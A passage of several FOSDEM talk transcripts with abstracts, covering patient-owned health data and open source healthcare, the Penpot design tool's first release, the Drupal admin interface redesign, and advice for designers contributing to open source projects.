So when I have a point with my clinician, something happens, I get something that's automatically pushed in my digital health record that in essence completes it because there's a contract in play between me and between that third party that then starts to say, okay, great, I can control my longitudinal digital health record. So how do I think about this? Well, if we were to make it in visual terms, I have some kind of encounter, whether it's at home, whether it's in a cardboard box in the alley, whether it's at a clinic, fine, I talk to a nurse. And he and we have this brokered data use agreement that says, okay, as a patient, yep, sure, I'll let you see it. I'll just see it for this long. And it articulates how that can work. And the underbelly of that really is a technical service that then pieces together the data, attaches it to the right place, and creates this sort of data receipt of what happened. And then that gets injected into my lifelong health record. That's in essence how I think this should work. Because we'll have this matrix-esque little patient data manager bot putting together your data in the context of whether I'm doing it from home, whether I'm talking to a device, whether I'm talking to a human, and ultimately this output goes back into my record. Because what does this get me? Well, it gets me something, one aspect of that is it gets me how complete is my record? Is my record empty? Is it half complete? No one really gets to complete, but it allows us to get some kind of glimpse as how many cobwebs are on it. Can I trust this data? By the way, as a side note here, it took a bunch of overeducated MDS and PhDs to put together a paper that says, drawing pictures helps comprehension for humans. Well, no kidding. But I think this is important because academics, scientists, all of us need ways to see stories versus being told and reading about them. So I think this is why many of us use this kind of powerful graphics in healthcare. Humans resonate with them. Okay. Onwards to owning your data. So number three, when you own it, you control access, damn it. And let's go back to just the creamy center of this is the DUA, the data use agreement, and then the data receipt is, we have a prototype type of this. It's on GitHub and you can control your data using a data manager, but we've made this accessible to most humans. It's written in very simple English that a fifth grader could understand. It's high contrast imagery. It's very simple, little graphic novels. And you can put this on top of any kind of framework. You can put it on top of Apple's health kit, which is open source or the Android's common health platform, and get deeper and deeper into this and actually see a receipt. What if you could actually listen to what happened in that conversation with your clinician? You see the data that happened, that moved and changed. You could see where it resides on the social determinants of health and your social circumstances attached to your data and vice versa, because it's yours. You should see all this because ultimately it gives you health autonomy by owning it. And what are those rights? Well, you can possess it. Yep, that's mine. You can share it to whoever, whatever you want. You can sell it. Yeah, you can destroy it too because it's yours. Now, the idea here is that patients co-own or fully own every health data point about themselves. 
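To make the encounter receipt and brokered data use agreement idea concrete, here is a minimal, hypothetical Python sketch of the data shapes involved. The field names and the completeness heuristic are invented for illustration; they are not taken from the GoInvo prototype on GitHub.

```python
# Hypothetical data shapes for a patient-held record: each encounter produces a
# receipt, and each receipt carries the brokered, time-boxed data use agreement.
from dataclasses import dataclass, field
from datetime import date
from typing import List, Set

@dataclass
class DataUseAgreement:
    grantee: str                  # who may see the data
    purpose: str                  # why access is granted
    expires: date                 # access is time-boxed, not perpetual
    may_share_onward: bool = False
    may_sell: bool = False

@dataclass
class EncounterReceipt:
    encounter_id: str
    clinician: str
    data_elements: List[str]      # common data elements touched in the visit
    agreement: DataUseAgreement   # terms attached to this specific encounter

@dataclass
class HealthRecord:
    owner: str
    receipts: List[EncounterReceipt] = field(default_factory=list)

    def completeness(self, expected: Set[str]) -> float:
        """Rough 'how many cobwebs' score: share of expected elements present."""
        present = {e for r in self.receipts for e in r.data_elements}
        return len(present & expected) / max(len(expected), 1)

record = HealthRecord(owner="me")
record.receipts.append(EncounterReceipt(
    encounter_id="2021-02-06-clinic-visit",
    clinician="Nurse Lee",
    data_elements=["blood_pressure", "medication_list"],
    agreement=DataUseAgreement(grantee="Nurse Lee", purpose="care", expires=date(2022, 2, 6)),
))
print(record.completeness({"blood_pressure", "medication_list", "allergies"}))  # ~0.67
```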
And anything that I generate with a clinician or clinic is co-owned by both parties, because they still need to have some rights once you come into the clinic — to see the information, make judgments, et cetera, and have it for audit, have it for research. And then anything I do on my own, I should fully own. It's my data, my rights. Any data service that doesn't give this to you is mistreating you. And it really is the last bastion of unfettered capitalism — selling your experiences, buying your mind. And I think that I demand patient ownership rights to put a kibosh on that. So you can look at this, if you want, at datauseagreement.org; it's on GitHub. And you need to see, I think, that it has publicly accessible code on GitHub, that it's licensed under the Apache license, and that it's there for the community — it's there for feedback, for interrogation. So why are all these things open source? Well, good reasons. You can't solve this problem of healthcare without community, without other people. Seventy years ago — and this sounds mighty open source to me — the Declaration of Geneva: I will share my medical knowledge for the planet. Fabulous. And here we have knuckleheads in the United States and elsewhere — it's not indigenous only here — whose algorithm, which is closed, is amazing: it drives care plans for half the population. Really? Well, if we think that healthcare is a human right — and it pretty much is — then when you use it, you don't know how it works, why it works, and who it works best for. And that to me is a sin. So if healthcare is so noble, if it's key to our life on earth and we don't have a choice, we demand healthcare to be open. Well, there's good precedent here: the internet — the infrastructure at least — is open source and a human right. And for those nerds in the audience who love the OSI model, most of the internet stack is open source. Fantastic. We have great examples of it driving this conversation and our viewing right now. And yet, in stark contrast, the healthcare stack is closed. Eric Topol calls it anti-open source in healthcare. Lots of good people have talked about it being open source — that Epic, the big giant electronic health record company, should be open source, et cetera. We just don't have it. One country on spaceship earth has data ownership for patients and an open source background: my home country of Estonia. It's a really fantastic example of how healthcare could work. Yet we're making strides, I think, across the planet with other open source healthcare services, and we see them in use in infrastructure, in common goods, and on the leading edge. And now that we've had a global emergency over the past year, you've seen a glut of open source projects in healthcare, which is fantastic. Here's the NIH's Value Set Authority. Here's my news feed actually having open source healthcare in it for the first time ever. You can see on GitHub there are 33,000 repos in COVID land — I mean, there's 6,000 for the date picker. My God, it's fantastic. At the studio we open source all of the work that we do internally, from understanding coronavirus to the multi-translated home care basics to hGraph to this data use project. The Linux Foundation has been radically moving the needle, hopefully more and more, same with MITRE and other institutions. It's a pretty amazing response, but we're not close to done. Because we really want march-in rights for the patent.
We want some kind of open patent, open chemistry, open license for the planet for the vaccine. We need to think about this as a public health issue and a public problem with public solutions. And this is part of our act is we have to be deliberate in how much we do and work in open source. We have to continue to evangelize. Open source is really contracting and has been for the past several years. And so we have to fight against that and pretend that it's not just something nice to do, but that it's an opt out strategy that we lead our companies into open source. This is how health care, open source health care prospers. Because look, health care and public health is utility. It's a human right and way too important to be closed. These algorithms that drive my care are all locked up in black box services. We need to interrogate them. We need to understand how to edit them, how they work and how to make them better for all. Because it is our health, it's my life, it's all of our lives at stake. And we demand that health care services be open to correct the bias. So to recap, health care data is more than you think it is. You don't own it and you damn well should. When you own your data, you control access and owning it gives you autonomy. And you really can't solve the health care systemic problems until you ask the community to join. Finally, having your health data can save your life. I have stolen from these people here and I thank them for it. And if you have any questions or want to read more, go here. Thank you very much.
|
We demand that patients own their data. We demand that healthcare services are open source. Because healthcare is too important to be closed. We are getting screwed. We’re dying younger, maternal mortality is ticking up, and big money is running healthcare, at our expense. The data that drive our care, the algorithms that dictates our parents care, our neighborhood’s care, our nation’s care, and the everyday services we rely on, feed on our experiences, are governed by black boxes and crooked biases, and are owned by others. It’s our health. Our very lives are at stake. We demand that patients own their data. We demand that healthcare services are open source. Because healthcare is too important to be closed. See how we, the atomic units of the health system, can bend it back to the light.
|
10.5446/53613 (DOI)
|
Take 23. No, I was kidding. Okay, so let's do this. Welcome to the talk on Penpot. It's my pleasure to be back at FOSDEM, whether it's face to face or online, to give you a nice follow-up on what we've been doing throughout 2020. At the time it was not called Penpot — that was something we decided a few months ago; initially the code name was UXBOX. What we wanted to do is bring to the free and open source ecosystem a professional platform for designers and creative people to be able to do all sorts of prototyping and design, particularly meant for digital products, like interfaces, or any sort of design that is meant to then be printed or interacted with, whether it's an app or a website or whatever. Our idea is that there are too many proprietary tools out there that do a fine job. It's tempting to decide that since the open source arena doesn't provide me, as a designer, with a tool that I can use professionally and work together with other members of a diverse and cross-functional team, I'll make an exception: while other people are using all sorts of open source tools, I'll have to admit and concede that I need to use Sketch or Figma or InVision. We decided: no way, we're going to make sure that we have a proper, outstanding, super professional platform — the likes of perhaps Blender in 3D modeling, but for prototyping and design. So a year has passed and now we're ready to announce what we promised. We promised back then that we would be giving you sort of an alpha, or a 1.0, or MVP, whatever you want to call it — the first public release that you can work with, that you can trust is actually stable and has a lot of features. Of course there's still a lot to do, we have a huge roadmap ahead, but you can already enjoy it and be productive with it, which is critical for that first impression: should I be able to use this, would I like to depend on this tool? We wanted a resounding yes on that first impression. That's a tough yes, because when do you stop actually developing a tool for that 1.0 that has to give you the feeling of a finished product and still a lot of potential? We think we have achieved that. Actually we did some extra work we didn't think we would be able to do in this time, and with the pandemic too, so all in all I think we are in a quite great moment. I'm going to share the screen now for you to enjoy. I'm going to do a voice-over commentary and show you a quick demo while I talk. This is Penpot, so welcome to 1.0. This is a pre-recorded session. That was Juan, one of the lead designers and founders of Penpot. He's going to offer an alternative design of the FOSDEM website — just an example: what would we do? Let's contribute to FOSDEM, even if it's just an exercise, probably futile, but it's something that you can relate to. This is a very FOSDEM-oriented presentation, as you can already feel. Here what you're seeing is the canvas. The canvas comes with grids and alignment and all sorts of tools and objects that you can add. Of course you can add text — there's a lot going on here — and images; the FOSDEM 21 there is not text, obviously. What Juan is doing is very quickly using the grid system and the intelligent alignment system, and all the proportions and sizes and widths and everything — Penpot is helping him to see whether things are aligned, or have the appropriate relationship or ratio. Now he's using the free path tool to draw shapes. You can see on your left all the layers. Some of them he will probably be renaming.
It's not path 4 or path 3, but it's actually a proper unique name because it has an entity. Here he's using that, color management, the translucency, opacity, shadowing. I think he actually rotated some stuff, reported the radios there. Now he's just imported from his image library, the Forstem logo, multiple selection and drag and drop movement. He's switching between visible grid and hidden grid, so he always has a one click away view of what's going on, how it's going to look. We wanted to make sure that people coming to Pembot would feel that all the useful suspects in terms of user patterns were there. The learning curve is really not steep. There's some familiarity with other tools that people use. We think it's very important that people feel productive from day one, particularly designers do value their ideas, their assumptions, their imagination really is able to be fleshed out rather quickly. The tool is an extension of themselves sometimes. They might feel frustrated if they cannot conceive something at the speed of their imagination. We make sure that Pembot, even if we have some own ideas on how things should work as a prototyping and design tool, we wanted to make sure people found themselves in familiar territory. The super minute interactions that make a difference, like the way I'm using the mouse, the reaction, the feedback of the tool is exactly what I would expect. We hope that you find Pembot very much as an extension of your own hand or body or mind. Here you see we have a lot of text transformation, duplicate objects with all its internal layers to speed up some work. Typography and text in general was a challenge because remember we are using SVG. SVG is our storage. SVG is a standard, it's an open standard, it's a pretty strong standard, but it's not being used by the competition, by all the platforms. They are using their proprietary formats. We decided that we wanted to pursue open standards also in files and formats and storage. So we are using SVG, but that came with its own challenges and one of them was definitely text management. So we had to come with very smart workarounds to still use SVG and have all the potential and capabilities of HTML and CSS. You've seen here how well we've felt. I think we managed to do some text wrapping and all that. It's really not that easy when you're using SVG. So this is of course not the speed at which Juan typically works. He's slowing things down a bit. This is one when I was worth of work, I speed at about six seconds I think. But he's doing this for the first time, he's just doing a nice forced-in website. He's really productive. He developed Pempot so he knows how to use all the little options. But he's also quite exquisite. At the moment we can say that Pempot team is using now Pempot for development design Pempot itself. So things that we are not showing here is the design system support for Pempot. So you can actually have files and canvas, you know, assets that can be then have this ripple effect that you change one thing, one definition, one color, one property in one item. But since that is considered a main component, the parent one, all the children will immediately be affected as long as you want it to be. Pempot will always tell you, hey, the parent item has changed and you are using these inheritance in this design. Would you like those changes to be applied here? So you know what's going on. Here you can see some gradients, color management, not only the color picker, but the color management. 
We're really, really proud of how fast and easy to use this. We wanted to make sure that every time you make any small change, you see all the different ratios and proportions being shown to you. So you get that second. So here is the, yeah, now he's duplicated a canvas. This is for the about page. So he mostly now has to get rid of stuff. So multiple selection, delete, bam, gone. And he will now add some, you see, very, you know, out of contextual dialogues, of course, the moment you select the tool, you get those extra dialogues that are relevant only for that tool. Sometimes you see, you see at the bottom, the color palette. We borrowed that idea from the great tool that it's in scape, which is a different kind of beats, you know, multi-purpose, victor, victorial platform. You can do a lot of stuff with the escape. And one of the things we like the most is the way they handle the color palette. And that color product actually grows. It is somehow keeping track of all the colors that you're using in case you want to just again go back and say, I like the purple. Thank you for now. That's the prototyping. So of course, we want to make sure that you can do this interactive prototyping with links and I click, I click again and show. And I want to show you here one of the things that we're most proud of all the code around the, you know, all the properties around any, any element. But of course, also the CSS and the SVG. Everything here, everything you've seen is actually code. We're not translating. We're not doing anything like some, yeah, some translation into SVG or CSS. This is native, native storage. You know, this is, this is our choice. This is our agenda. This is how we lobby for open standards. We're using SVG and CSS as an easy translation. After that, we're going to show you comments, you know, we're slowing things down a bit. So you get notifications for comments. We need to have this stuff because it's, it's, it's all about teamwork and workflows and conversation. And this is pretty, you know, this is standard in the, in the industry at the moment. So you can navigate through all the comments. And also if you go to the prototype and activate comments, you can see also, you know, overlaid the comments and you can interact and do stuff also on prototype level, which is very typical for stakeholders. This will be the multi-user. And this is going to actually be the last part of the demo or the Surrealized demo. Here you can see three users at the top. You see three icons. And so three people are working here together, although you only see two at the moment. That's one and Andy. And from one's perspective, he's working, he's doing, he's aware of Andy's presence. And also he's aware of what he's doing more or less. I mean, things are in a way a bit transactional. So the moment that Andy, you know, clicks, enter or just whatever is when, when you actually see that, that change applied to the, to the shared canvas. Okay. So this was pretty much what I wanted to show you in terms of the platform. You cannot have that without team collaboration. And that means private management and all the things that come with permissions and inviting people and having shared drafts and all that. So I didn't show you that because that is a challenge to do, to, to make it right. But, you know, the exciting stuff lies, lies in the, in the canvas and the prototype and the low code and the common system and the multi user simultaneous multi real time user thing. 
We just released this a few days after we actually released 1.0: we wanted to launch the official Penpot on-premise Docker image. This is important for us because everything is software as a service at the moment. We want to, of course, provide services, but we want people to be able to download this and use it locally, whether on their laptops or on their own servers or whatever. And we want to continue to develop features to bridge the existing gap with established design apps — the ones I already mentioned — because we want to make it less and less likely that someone will dismiss Penpot upon first use. For us it's very important, particularly for designers, that the first impression is good enough for them to say, okay, I'm going to continue to trust this for some days and see how it goes. We also want to pursue some migration success stories from the competition. We want to hear from people saying: I was using Figma and now I'm using Penpot, and I'm very glad that I did, because blah, blah, blah — please tell us and share those stories. Any migration is going to be good for the open source ecosystem, and for the community to know about those stories. So that would be great; we'll try to pursue those migration success stories. We want to work on SVG import, so that you can edit any SVG you're importing from other tools and do it in a really modular way — and that's a challenge, accepting SVG from other tools, because SVG sometimes gets messy depending on the tool. We want to add Boolean operations across elements. We want to have some sort of file management also. We also want to be able to import files from competitors, like Figma files or Sketch files, and see if we can do some transformation and import them with acceptable loss of information. And you saw the interactive prototype, where you were linking items to pages and then you have the typical click-and-go-there; that's fine, but we want to give you more advanced interactions. And we also want to work on Taiga and Penpot integrations. So this is Taiga — well, actually, these are two screens of Taiga. This is the Kanban, zoomed out and very compact, and expanded. This is basically Taiga 6, which we also released a few days ago. Taiga is all about agile project management, and it's open source — we've been doing this for a few years now. I mean, we are the developers of Taiga, and we are the developers and creators of Penpot, so it made sense that we would have some sort of bundle, some integration. There's some low-hanging fruit in terms of features and integrations, like: I will close an issue while I'm in Penpot, or I will create a new design from a new user story in Taiga — things like that are pretty simple and straightforward. But we want to think more creatively, because we think it's all about the process, the workflow and team collaboration, and we think those two tools match together really nicely. So yeah, this is Taiga 6. You probably already heard about this, but you can go to taiga.io and check it out. This is the sprint view, this is the Scrum view, and also different zoom levels for the sprint taskboard, which would be the screens used during a sprint. So if you didn't know about Taiga, go and check it out.
Integration with Git repositories, so that every design, every bit of SVG code that you have, is also being synchronized with a Git repository and you can go back and forth between the Git repository and Penpot. Perhaps you want to edit the SVG in the Git repository and you see the new color popping up in the Penpot interface (a rough sketch of that idea follows below). And of course, related to that, actively managing community contributions, because we feel a lot of plugins and ideas will come from the community. And that is probably going to take the rest of the year. And that's it. So, call to action. There are two things we would like to ask you. One: just try it out, post an article or a review, tell us what you think, spread the word if you feel like it. You can send us a message or an email — we want to know your opinion on this. And the second thing, besides trying it out, writing about it, sharing about Penpot: what do you want us to develop, or what do you think you could contribute, whether it's features or assets? Because we feel there's also going to be a lot of open source design material — assets like logos, shapes, icons, with all the SVG love, or bitmaps. We would like to know what you think we should be doing next. We need to hear from you — we will actively be doing polls and all that, but feel free to tell us how the roadmap should look in the foreseeable future. So this was it. Thank you very much for your time. I hope you like what we've developed over this year. We continue to work full time, full speed — a really exciting year ahead. Thank you very much. Thank you, FOSDEM.
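As a footnote to the Git integration idea mentioned above: because Penpot's storage format is standard SVG, the round trip described — edit the file in the repository, see the change back in the tool — could be approximated with nothing more than the Python standard library. This is a speculative sketch, not an official Penpot integration; the file name and color values are made up.

```python
# Hypothetical round-trip helper: open an exported Penpot SVG tracked in Git,
# swap one fill color, and write it back. File name and colors are placeholders.
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
ET.register_namespace("", SVG_NS)   # keep the default SVG namespace when saving

tree = ET.parse("fosdem-landing-page.svg")
for node in tree.iter():
    if node.get("fill") == "#7000e0":    # old accent color
        node.set("fill", "#31efb8")      # new accent color
tree.write("fosdem-landing-page.svg", encoding="utf-8", xml_declaration=True)
```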
|
Penpot (formerly UXBOX) is an Open Source online design & prototyping platform with the aim of bringing the whole team to the design process. Penpot is multiplatform (web based) and based on open standards (SVG). The platform provides a set of tools meant not only for designers but also for developers and stakeholders. Design, prototype, feedback system, handoff specifications and low-code among them. We will share our vision, Penpot’s current state and our next challenges about the project. We will also perform a demo and hope to contribute to the already open channel between FOSS and Design.
|
10.5446/53615 (DOI)
|
Hello and welcome to my talk, redesign of an established open source CMS. My name is Sascha Eggenberger, I'm a senior UX designer at Unic and I'm one of the lead designers of the Drupal design system. I've been with the Drupal community for almost nine years now, and you can find me under the handle Sascha Eggenberger on most social media like Twitter, Drupal.org, Dribbble and so on. Today I want to give you a brief history of Drupal, then talk about the redesign of the admin UI of Drupal, then I have some takeaways for you, and last but not least I can take some of your questions. So let's dive in. Drupal is an open source CMS — or sometimes called a CMF, a content management framework — which was first released 19 years ago. So it's quite an old timer among CMSs, but it got a lot of improvements over the years. The last major release is Drupal 9, which was released in June last year, so June 2020. The Drupal community counts almost 1.4 million members, of which around 120,000 are active contributors. Compared to that huge number, only a few people in this community consider themselves designers and are active contributors over a longer period of time. I want to take you down memory lane beginning with the UI of Drupal 7, because from Drupal 7 on it's most relevant to what you will see today — so we'll skip Drupal 1 to 6. Here we go. Drupal 7 was released in January 2011 and it featured a completely new UI. This was the UI when it was launched in 2011. As you can see, nowadays we would consider it quite uninspirational, but back then it was one of the more modern and nicer admin UIs out there. Then with the introduction of Drupal 8 in November 2015 the admin theme was revised a bit, but basically, as you can see in the screenshot, the design language was taken over from 7 and just improved — there was no big redesign going on between Drupal 7 and 8. And with the introduction of Drupal 9 in June of last year, as you can see — and it's not a mistake — basically the default admin UI stayed exactly the same as in Drupal 8. It still uses the so-called Seven theme. So this is basically where we are today. I want to show you some more screenshots. What you can see here is the content overview. When you log in, this is the editor view, so you have all the nodes, all the content, in this list, and you have some actions above. Let's go to the next screenshot. This is basically the editor experience you get out of the box from Drupal, with some fields like a text field, a WYSIWYG field and some other fields, some media as you can see, and meta information. Another screenshot is this: this is basically the Manage Fields UI, where you just have a table with a list of fields which you can edit via the actions, the operations, on the right. And last but not least you can see here the configuration overview, where you have an overview of all the different subsections of the configuration menu, which uses this layout here. So this is the current state of how Drupal looks when you do a fresh install — no matter if it's Drupal 8 or 9, you will get the same experience out of the box, from a visual point of view of course. So I think it's fair to say that Drupal didn't have a design refresh in recent years. The focus was heavily under the hood, with the switch to Symfony, the PHP framework.
There were some API-first approaches implemented, a new template engine called Twig was used, and there were a lot of things going on in terms of headless, but it didn't receive a refresh in terms of design. So basically the design stayed the same for quite a long time. This is a quote I found on the internet: "The Drupal admin UI looks outdated." You will find similar quotes basically everywhere on the internet. So there was basically an outcry that Drupal stayed the same and all the under-the-hood improvements weren't acknowledged in visual terms, right? Because in the visual design language we basically stayed behind the competition, while from a technical point of view Drupal is quite on par with other solutions, or superior to other solutions out there. There was an initiative called the Admin UI and JavaScript Modernization initiative. That was founded around, I think, three years ago, if I remember correctly, and the goal was to breathe some fresh air into the admin UI. This is just some context information for the designs and some design clues you will see in the progress now. So, the redesign. Let's dive in. The principles of the Drupal design system, as we call it, are these. In a nutshell, we have precise shapes and strong contrast. We give emphasis to what matters. We use hierarchy to explain the relation between elements. We use predictable patterns, and each element should serve a clear purpose. We also want to appeal to the greatest possible number of people, and we want to ensure that the visual style is extensible and flexible all over the design system. Accessibility is our main concern and we're heavily accessibility driven, so I would call the design system accessibility first, if you will. I want to share just one screenshot with you. As you can see, we defined a distinct color for focus. So for each element the user can focus, we have this green border around it, and this color is not used anywhere else than just for focus. But in terms of accessibility, of course, a lot more is taken into account, like spacing and contrast and so on. I think I could give a whole talk of my own when it comes to accessibility, but we will keep it short for today. The typography is based on a modular scale. So we use a modular scale to keep the rhythm across UI texts consistent. This is the scale, as you can see here. As a base font size, we use 1rem, or 16 pixels in most browsers. And for colors, we have very few colors defined. We use this vivid blue, Absolute Zero, for accents and for more important UI elements like primary actions and so on. The rest of the colors are basically more gray tones or grayish colors. And the secondary colors, the red, green and yellow, are basically used for messaging, like system messages, success messages and so on. You can find more about the design system at this URL. There are also a lot of resources online and other talks which deep dive into the design system, so check those out if you're more interested in the design system part. Claro. Claro is basically the first fruit of the design system, and this is what it looks like when everything from the design system comes together. As you can see, compared to the designs of Drupal 7, it has more air to breathe.
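To make the modular scale mentioned above a little more concrete, here is a minimal sketch in Python. The 16px (1rem) base is from the talk; the ratio of 1.25 is only an assumed placeholder, not the actual value used by the Drupal design system.

```python
# Illustrative only: a modular type scale in the spirit of the one described
# in the talk. The 16px (1rem) base comes from the talk; the 1.25 ratio is a
# placeholder assumption, not the actual Drupal design system value.

BASE_PX = 16.0   # 1rem in most browsers
RATIO = 1.25     # hypothetical scale ratio

def modular_scale(step: int) -> float:
    """Font size in pixels for a given step on the scale (0 = base size)."""
    return round(BASE_PX * RATIO ** step, 2)

for step in range(-2, 5):
    px = modular_scale(step)
    print(f"step {step:+d}: {px:6.2f}px ({px / BASE_PX:.3f}rem)")
```

Each step simply multiplies the base by the ratio, which is what keeps the rhythm across UI text sizes consistent.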
So we use more spacing, but also the different elements are more consistent and you have clear calls to action. This is the content editor form; as you can see here as well, some elements with a WYSIWYG field, some configuration, and this is the configuration overview. So Claro, this is basically the name of this new admin theme. It's included in Drupal core since Drupal 8.8 as an experimental theme. It's not finished yet, so we flag it as experimental; it's not activated by default, you need to manually activate it. It's planned that Claro gets a stable release with Drupal 9.2, which is out around mid next year. You will find us at drupal.org/slack; the two channels, admin UI and admin UI design, are the ones we use for communication, so feel free to join there. This is, as I mentioned, just the first fruit of the design system. As the next step, I want to show you some designs of what we internally call the future UI. This whole thing started as a customization layer for Claro exactly one year ago and it serves as an ideation space for Claro. And this is how it looks. This is the login. This is the overview we saw. As you can see, we use a vertical navigation approach. We have the calls to action always sticky at the top right, so we have a sticky portion. It's a cleaned-up UI. We use different layers to combine UI elements which belong together. This is the editor view, so when we edit content as well, it's way cleaner. We have a real sidebar with all the meta information there, we have a sticky save button at the top, and then the configuration overview, the revamped media library, and we have a lot of options. You can set whatever accent color you like, you can use your own one, you can use branding, replace the logo with your own brand or your client's brand, and we have a lot of other customization options. So it could look like this when we use another accent color, or you could go all in and use the built-in dark mode. Another thing which we really look at is contextual information, so information that appears when you need it and is not in the way in the UI all the time, as you can see in the example. Here we used it for quick actions, for bulk select, which is only needed if you select more than one item. So that's just a short example. Major Drupal distributions already use this Gin theme as their default admin UI. It's available for download as a contrib theme at drupal.org/project/gin, so you can go and download and test drive it today. Feel free to contribute to everything you saw today, to Gin or Claro; everything is open and everybody is welcome to contribute. So, the takeaways. We have a heavy focus on accessibility, Claro is on track to get stable with Drupal 9.2, and Gin further improves the overall experience. You will find more, as I mentioned before, in-depth talks about the admin UI online all over the place from different speakers. And I want to mention this because it is the most important one: it's a community effort. So thanks to all contributors. There are a lot of them, and without every single contribution this wouldn't be possible. Thank you. Are there any questions? I guess we are going to be live in a few seconds or minutes. Okay. So, questions. Yeah. One question from the audience is: do I have to learn the PHP language to use Drupal? Yeah. So the answer is: if you're a user, no, you don't have to. If you're a designer or a front-end engineer, you don't have to.
If you want to do back-end stuff, then well, guess yes, you have to because it's written in PHP. So yes and no, depends on what you want to do. Okay. So another question is how long and how many people to create the design system? So the design system is now in the making for, let me think, two and a half years, three years maybe. And there are a lot of people which are basically on and off. So there were a lot of designers joining for a couple of months, so weeks and then leaving again. But basically like the core is maybe like four or five designers which are around for a longer period and a lot of other designers are just basically hopping in and on and off. But I think that's totally fine in open source anyway. So yeah, it depends a bit. Okay. So Belen is asking what kind of user research was done while designing the new UI? There were many user researches done. So there was a survey which was basically, there was one survey which was basically made for content editors. So for large, like in large organizations which use Drupal, like governments and stuff like that. And then there was another survey made for agencies and you know, like builders. So we gather basically feedbacks on the needs of people who build sites with Drupal and with people who use the site in the end. Because until now it was heavily driven by the community and the creators and not for the actual users in the end, like the end users, the content editors and you know, like site administrators. So there's quite some shift in focusing on the end user. Sounds good. I guess that the bot lords will cut off the video any minute. So we probably can take another question, but this talk room will get public after this talk so anyone can hop into the room and then join the video call to ask more questions. So Ariel was asking what is the secret Drupal design has for keeping up with the design volunteer contributions? There is no special secret because I think we didn't crack the code for that yet. As I mentioned before, there are a lot of people who are basically like hopping on and off. So yeah, I'm also looking for that secret or special secret codes. If you know it, let me know. I guess we shouldn't take another question to avoid getting cut off in the middle. I will try to answer all the other questions in the chat.
|
In this session I'll talk about the brief history of Drupal & the Drupal interface, how it has evolved and why this redesign is an important step for the future of Drupal. As it's important to be inclusive, and we treat this as a key value in the Drupal community, we made inclusivity & accessibility the main priority. I will dive into the Design System, the principles behind it, and the new interfaces which are based off this Design System: Claro, the new, upcoming default admin experience, and Gin, the so-called "Future UI", which started as a pure vision and is now available as a contrib theme which you can use today.
|
10.5446/53616 (DOI)
|
Hi everyone, welcome to the FOSDEM 2021 Open Source Design Dev Room. My name is Abigail McCorrell and I will be talking to you about the open source designer's toolbox: basically, recommended techniques and tools for open source designers. Now when I thought about speaking on this topic, I had no idea how I was going to structure this toolbox, because there is a variety of information and resources that are relevant to designers contributing to open source. So I had this idea to keep it simple and just make it something that every open source designer can refer to when thinking of their own strategy for contributing to open source. So we will start by trying to understand what open source design is all about, and this is basically how I have defined it: it involves introducing creative problem-solving processes to projects that are free and open to read, modify and share. So it is really open source plus design, and while preparing this presentation, of course, I searched for a definition of open source design, but it's not surprising that I didn't find a lot of information on that, because open source design is an emerging space, and it is nice to see more people get interested in what designers are doing and can do for open source software. So this is how I understand open source design, and I hope that it has captured the concept of making open source design contributions. So now that we know what OSD is about, what should you know as an open source designer? Well, you should know how to communicate. Just by virtue of being a designer, you can already expect that there will be barriers to participating in the open source community. This is because open source is more focused on programming and coding, and that is how it has been for a while. So there is a lot of tech jargon that most designers don't understand, like IRC, GitHub or Git or version control. These things are not terms that designers are familiar with, and that can be quite discouraging. But you should know as a designer how to communicate and present your ideas, put them forward, or put yourself forward, in a way that you can build your identity and help people get to know you, understand your ideas and hopefully get your ideas accepted. So when you post messages in the team chat or you have conversations with other team members, you want to make sure your messages are comprehensible; make sure people can understand what you're asking about, and you also want to make sure you've done good research beforehand so you don't weigh down other team members. Making sure your messages are easy to understand makes it easier for people to respond to you quickly and want to offer their help, and all of this helps you to get integrated into the community. So beyond communicating, also know how to engage and become a part of the community. It shouldn't be one-sided, you know, always seeking advice or feedback; give back to the open source community. Now most of these communities have events that they hold regularly, so try to attend those events, because you get to network with other members on your team. You can also give feedback and also get feedback from these team members, and very important too is the fact that you can suggest improvements for the team or for the project, you know, how to make it better. These events really give you an opportunity to do so. So trying to become a part of the community really helps you to build an identity for yourself, as we mentioned earlier.
That identity definitely facilitates your contribution and your work. So, definitely know how to contribute. This is what many designers look forward to when they ask about contributing to open source design: just getting into the nitty-gritty of the design work, and that is great. If you're just getting into open source design, you can explore some good first design issues, like conducting a heuristic evaluation of the project's user interface. You can design empathy maps and personas based on any existing user research data; it really helps to get other team members in the room and help them understand who the project is being designed for and put themselves in their shoes. You can design sticker sheets or style guides or design systems, which help the design team to work together and collaborate, and really help the project design to be more consistent, to have a more consistent look and feel. And if you're more visual design inclined, then you can definitely design some branding assets, logos, t-shirts, things that can help the brand image of the project to really stand out. Before I come to document, one thing about making contributions in open source: it's always quality over quantity. So you don't want to be the first to make so many design contributions that don't really make sense or that don't add any value to the project. Make sure you're identifying a problem and trying to solve for that problem. It's always about the quality, the value you can add to that project; it's not just for the sake of contributing or opening design issues and all that. So, document, document. As designers we document everything, because we know we definitely cannot rely on memory alone; we can easily forget what design decisions were made and when, or even why they were made. So we want to make sure that our design deliverables are presented and documented effectively. Some ways you can do that are by taking advantage of design labels. So if the project already uses design labels, that is, it groups design issues based on categories like UX, UI, branding, research, design labels really help to organize these design issues for others who may be looking to contribute in the future. And if the project doesn't already use design labels, then you can make that suggestion. You should also check if the project has a CONTRIBUTING.md file for design, somewhere that designers can visit to see how they can make design contributions, how to get started, and the points of contact. So you can always look out for that. You can frame design issues on GitHub as design challenges, and this just means providing more context or information about that issue. So what is the problem you're trying to solve? Who are you solving this problem for? Who are you designing for? What solution or solutions are you exploring, and how can you tell if those solutions are effective? How would you test the solution to see that it is successful? Adding this extra information to your design issues basically helps to give more background information and helps anyone understand what the designer was thinking when they set up this challenge, so they can easily see how to contribute to the problem or to the issue being solved. You should also use issue threads. So every design issue on GitHub will have a thread where conversations on that issue are maintained.
